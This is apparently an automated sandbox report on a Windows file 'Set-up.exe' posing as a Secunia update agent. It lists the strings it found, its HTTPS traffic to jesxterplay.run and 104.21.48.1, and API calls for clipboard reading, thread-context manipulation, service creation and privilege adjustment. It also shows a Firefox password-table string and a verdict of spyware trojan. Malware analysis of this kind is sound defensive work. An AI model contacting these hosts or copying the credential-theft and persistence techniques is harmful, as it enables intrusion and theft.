Source: Set-up.exe, 00000000.00000003.1549782091.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1422733773.0000000000F6C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1511700286.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1457766483.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhd
Source: Set-up.exe, 00000000.00000003.1549691901.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1531434618.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhd2
Source: Set-up.exe, 00000000.00000003.1512532105.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhd?
Source: Set-up.exe, 00000000.00000003.1531434618.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549566194.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1550004919.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhdE
Source: Set-up.exe, 00000000.00000003.1549691901.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1531434618.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhde
Source: Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/tuyhdw
Source: Set-up.exe, 00000000.00000003.1531434618.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run:443/tuyhd
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49702 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_3_02CECC00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

0_3_02CECC00

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_3_02CECC00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

0_3_02CECC00

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00DB10E8 NtTerminateThread,	0_3_00DB10E8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00DB0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_3_00DB0B72
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00DB0CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_3_00DB0CD8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00DB066E NtProtectVirtualMemory,	0_3_00DB066E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD207A NtProtectVirtualMemory,	0_2_00CD207A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD203C NtFreeVirtualMemory,	0_2_00CD203C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD1FE9 NtAllocateVirtualMemory,	0_2_00CD1FE9

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00738960 DeleteService,GetLastError,__CxxThrowException@8,

0_2_00738960

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE5094	0_3_02CE5094
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE51EA	0_3_02CE51EA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF21E0	0_3_02CF21E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF6100	0_3_02CF6100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC166C	0_3_02CC166C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC47CF	0_3_02CC47CF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC5780	0_3_02CC5780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDD410	0_3_02CDD410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBB540	0_3_02CBB540
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF2540	0_3_02CF2540
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBD9E0	0_3_02CBD9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD5970	0_3_02CD5970
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFD930	0_3_02CFD930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC1EAB	0_3_02CC1EAB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC9EB8	0_3_02CC9EB8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCEFB0	0_3_02CCEFB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFCDC0	0_3_02CFCDC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDC2A0	0_3_02CDC2A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD62A0	0_3_02CD62A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBC210	0_3_02CBC210
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD9220	0_3_02CD9220
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFD220	0_3_02CFD220
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB23C0	0_3_02CB23C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF03D2	0_3_02CF03D2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEA350	0_3_02CEA350
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC5377	0_3_02CC5377
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE5094	0_3_02CE5094
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB9090	0_3_02CB9090
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCE074	0_3_02CCE074
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB3000	0_3_02CB3000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD3170	0_3_02CD3170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBB120	0_3_02CBB120
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE56CA	0_3_02CE56CA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC06C7	0_3_02CC06C7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEC6F0	0_3_02CEC6F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE56B8	0_3_02CE56B8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD2670	0_3_02CD2670
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB8600	0_3_02CB8600
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF3610	0_3_02CF3610
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF17D0	0_3_02CF17D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDC789	0_3_02CDC789
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCB7B2	0_3_02CCB7B2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCA74D	0_3_02CCA74D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE6770	0_3_02CE6770
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD3710	0_3_02CD3710
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC34AD	0_3_02CC34AD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE545A	0_3_02CE545A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEC460	0_3_02CEC460
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBF540	0_3_02CBF540
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFD560	0_3_02CFD560
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE052B	0_3_02CE052B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF1A30	0_3_02CF1A30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC2BA0	0_3_02CC2BA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC3BA1	0_3_02CC3BA1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE8B59	0_3_02CE8B59
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEDB00	0_3_02CEDB00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB8B10	0_3_02CB8B10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF0B14	0_3_02CF0B14
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDFB30	0_3_02CDFB30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE08C0	0_3_02CE08C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD18DB	0_3_02CD18DB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDE8A2	0_3_02CDE8A2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC88B0	0_3_02CC88B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBA870	0_3_02CBA870
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFC800	0_3_02CFC800
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCD829	0_3_02CCD829
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD89C6	0_3_02CD89C6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEA9EC	0_3_02CEA9EC
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB39A0	0_3_02CB39A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEB978	0_3_02CEB978
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CEC970	0_3_02CEC970
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB7900	0_3_02CB7900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD6900	0_3_02CD6900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CBC930	0_3_02CBC930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE3EEC	0_3_02CE3EEC
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE0E90	0_3_02CE0E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CB9E70	0_3_02CB9E70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCBFDF	0_3_02CCBFDF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE3F5B	0_3_02CE3F5B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDEF3F	0_3_02CDEF3F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDECAA	0_3_02CDECAA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CFAC70	0_3_02CFAC70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CECC00	0_3_02CECC00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCBC20	0_3_02CCBC20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CD4DC0	0_3_02CD4DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CF3DC0	0_3_02CF3DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE9DE9	0_3_02CE9DE9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CE7D82	0_3_02CE7D82
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDFD98	0_3_02CDFD98
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00756013	0_2_00756013
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007201E0	0_2_007201E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00750240	0_2_00750240
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007442FA	0_2_007442FA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007583A2	0_2_007583A2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00730550	0_2_00730550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0074472F	0_2_0074472F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00754830	0_2_00754830
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00758B1E	0_2_00758B1E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00754D83	0_2_00754D83
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00747450	0_2_00747450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007555CF	0_2_007555CF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007435B9	0_2_007435B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00751766	0_2_00751766
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007557E9	0_2_007557E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00755875	0_2_00755875
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007578C2	0_2_007578C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0074591D	0_2_0074591D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00743AAD	0_2_00743AAD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00755BF8	0_2_00755BF8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00719BA0	0_2_00719BA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00755B89	0_2_00755B89
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00755C07	0_2_00755C07
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00755D57	0_2_00755D57
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00759D4C	0_2_00759D4C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00745D20	0_2_00745D20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00757E32	0_2_00757E32
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00743EC5	0_2_00743EC5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD05DF	0_2_00CD05DF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD0000	0_2_00CD0000

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 02CC88A0 appears 100 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00713CD0 appears 81 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 007473F0 appears 50 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00713170 appears 77 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0073E7E8 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 02CBAFC0 appears 75 times

Source: Set-up.exe, 00000000.00000002.1576452423.000000000077B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSUA.exeJ vs Set-up.exe
Source: Set-up.exe, 00000000.00000003.1409327455.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSUA.exeJ vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilenameSUA.exeJ vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/2

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00726930 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00726930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00726A20 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00726A20

Source: C:\Users\user\Desktop\Set-up.exe

Code function: GetDriveTypeW,CopyFileW,GetLastError,OpenSCManagerW,GetLastError,_wcsstr,CreateServiceW,GetLastError,Sleep,GetLastError,ChangeServiceConfig2W,GetLastError,GetLastError,ChangeServiceConfig2W,StartServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,WaitForSingleObject,WaitForSingleObject,QueryServiceStatus,

0_2_00733540

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00CD0CEF CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,Thread32Next,

0_2_00CD0CEF

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_3_02CF2540 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,

0_3_02CF2540

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0071107D LoadResource,

0_2_0071107D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00738740 StartServiceW,GetLastError,__CxxThrowException@8,

0_2_00738740

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00735320 StartServiceCtrlDispatcherW,GetLastError,

0_2_00735320

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1434079980.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1446505025.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1446885249.0000000003C35000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1434448554.0000000003B39000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe	String found in binary or memory: --stop
Source: Set-up.exe	String found in binary or memory: --start
Source: Set-up.exe	String found in binary or memory: --install
Source: Set-up.exe	String found in binary or memory: --help
Source: Set-up.exe	String found in binary or memory: --help
Source: Set-up.exe	String found in binary or memory: --service-launch
Source: Set-up.exe	String found in binary or memory: --help
Source: Set-up.exe	String found in binary or memory: --help
Source: Set-up.exe	String found in binary or memory: %-25s \*Secunia Update Agent3.0.0.11005sua.exeSOFTWARE\Secunia\suaDownloads and updates applications for the Secunia PSIsua_log.txt-- Logging Settings --LogLevelLogFileLogFileMax-- Internal variables --APPNAMEBINNAMEVersion--help-h--version-V--verbose-v--debug-dLoggingLogFile, version vector<T> too long0
Source: Set-up.exe	String found in binary or memory: %-25s \*Secunia Update Agent3.0.0.11005sua.exeSOFTWARE\Secunia\suaDownloads and updates applications for the Secunia PSIsua_log.txt-- Logging Settings --LogLevelLogFileLogFileMax-- Internal variables --APPNAMEBINNAMEVersion--help-h--version-V--verbose-v--debug-dLoggingLogFile, version vector<T> too long0
Source: Set-up.exe	String found in binary or memory: --install
Source: Set-up.exe	String found in binary or memory: --start
Source: Set-up.exe	String found in binary or memory: --stop
Source: Set-up.exe	String found in binary or memory: 4@`(B@<Not Set><Set>:--service-launch-- Service options --InstallServiceRemoveServiceStartServiceRestartServiceStopServiceServiceLaunchOnlySaveSettingsDeleteRegistrySettingsForegroundDontWriteRegistryDryRunManualCopyPathRunAsLocalSystemRunAsUserRunAsPass Install service. Remove service. Specify the user the service should run as.
Source: Set-up.exe	String found in binary or memory: 4@`(B@<Not Set><Set>:--service-launch-- Service options --InstallServiceRemoveServiceStartServiceRestartServiceStopServiceServiceLaunchOnlySaveSettingsDeleteRegistrySettingsForegroundDontWriteRegistryDryRunManualCopyPathRunAsLocalSystemRunAsUserRunAsPass Install service. Remove service. Specify the user the service should run as.
Source: Set-up.exe	String found in binary or memory: Deletes these settings from all registry keys. When installing, set service to only be started manually>. Before installing, copy executable file to <dest> and install the service to run from <dest>. Run the program without writing any changes, and exit.--- Service Options: ---S-1-5-18LocalSystemRemoving registry key ) Error deleting key from registry (Unable to determine SID of target user account ''. The message returned by the system () was: Error when prompting for password () => accessing user account '' () =>Will prompt for a password when installingDry run. Cutting out before doing any changes.--install-i--remove-r--start--restart--stop--only-save-settings-S--delete-all-settings--foreground-fg--no-registry-write-N--dryrun--dry-run--manual--copy-p--localsystem-L--runas-R => Error removing service An error occurred while attempting to read settings from the registry.Not writing to registryEncrypted registry settings are required but encryption is not possible when running as the LocalSystem user.An error occurred while attempting to save settings to the registry.Saving settings to registryAborting.Unable fully emulate running as the LocalSystem userAn error occurred when running service in consoleStarting Service in consoleAn error occurred when launching serviceInvalid service options specified. Aborting.Multiple incompatible service options specified. Aborting.No service option specified. Aborting.Incompatible service options specified. Aborting.Cannot run as LocalSystem and as a specific user.Unable to access installed service (Registry path is empty.No user account set.Not removing saved configurationError removing saved configuration:Service already runningFailed to restart service: service cannot be stoppedLaunching serviceDry Run. Not writing any changes.Not removing installed serviceRegistry path not set. Not deleting registry settings.Not removing registry key CTRL-C Received, waiting for graceful termination
Source: Set-up.exe	String found in binary or memory: Deletes these settings from all registry keys. When installing, set service to only be started manually>. Before installing, copy executable file to <dest> and install the service to run from <dest>. Run the program without writing any changes, and exit.--- Service Options: ---S-1-5-18LocalSystemRemoving registry key ) Error deleting key from registry (Unable to determine SID of target user account ''. The message returned by the system () was: Error when prompting for password () => accessing user account '' () =>Will prompt for a password when installingDry run. Cutting out before doing any changes.--install-i--remove-r--start--restart--stop--only-save-settings-S--delete-all-settings--foreground-fg--no-registry-write-N--dryrun--dry-run--manual--copy-p--localsystem-L--runas-R => Error removing service An error occurred while attempting to read settings from the registry.Not writing to registryEncrypted registry settings are required but encryption is not possible when running as the LocalSystem user.An error occurred while attempting to save settings to the registry.Saving settings to registryAborting.Unable fully emulate running as the LocalSystem userAn error occurred when running service in consoleStarting Service in consoleAn error occurred when launching serviceInvalid service options specified. Aborting.Multiple incompatible service options specified. Aborting.No service option specified. Aborting.Incompatible service options specified. Aborting.Cannot run as LocalSystem and as a specific user.Unable to access installed service (Registry path is empty.No user account set.Not removing saved configurationError removing saved configuration:Service already runningFailed to restart service: service cannot be stoppedLaunching serviceDry Run. Not writing any changes.Not removing installed serviceRegistry path not set. Not deleting registry settings.Not removing registry key CTRL-C Received, waiting for graceful termination
Source: Set-up.exe	String found in binary or memory: Deletes these settings from all registry keys. When installing, set service to only be started manually>. Before installing, copy executable file to <dest> and install the service to run from <dest>. Run the program without writing any changes, and exit.--- Service Options: ---S-1-5-18LocalSystemRemoving registry key ) Error deleting key from registry (Unable to determine SID of target user account ''. The message returned by the system () was: Error when prompting for password () => accessing user account '' () =>Will prompt for a password when installingDry run. Cutting out before doing any changes.--install-i--remove-r--start--restart--stop--only-save-settings-S--delete-all-settings--foreground-fg--no-registry-write-N--dryrun--dry-run--manual--copy-p--localsystem-L--runas-R => Error removing service An error occurred while attempting to read settings from the registry.Not writing to registryEncrypted registry settings are required but encryption is not possible when running as the LocalSystem user.An error occurred while attempting to save settings to the registry.Saving settings to registryAborting.Unable fully emulate running as the LocalSystem userAn error occurred when running service in consoleStarting Service in consoleAn error occurred when launching serviceInvalid service options specified. Aborting.Multiple incompatible service options specified. Aborting.No service option specified. Aborting.Incompatible service options specified. Aborting.Cannot run as LocalSystem and as a specific user.Unable to access installed service (Registry path is empty.No user account set.Not removing saved configurationError removing saved configuration:Service already runningFailed to restart service: service cannot be stoppedLaunching serviceDry Run. Not writing any changes.Not removing installed serviceRegistry path not set. Not deleting registry settings.Not removing registry key CTRL-C Received, waiting for graceful termination
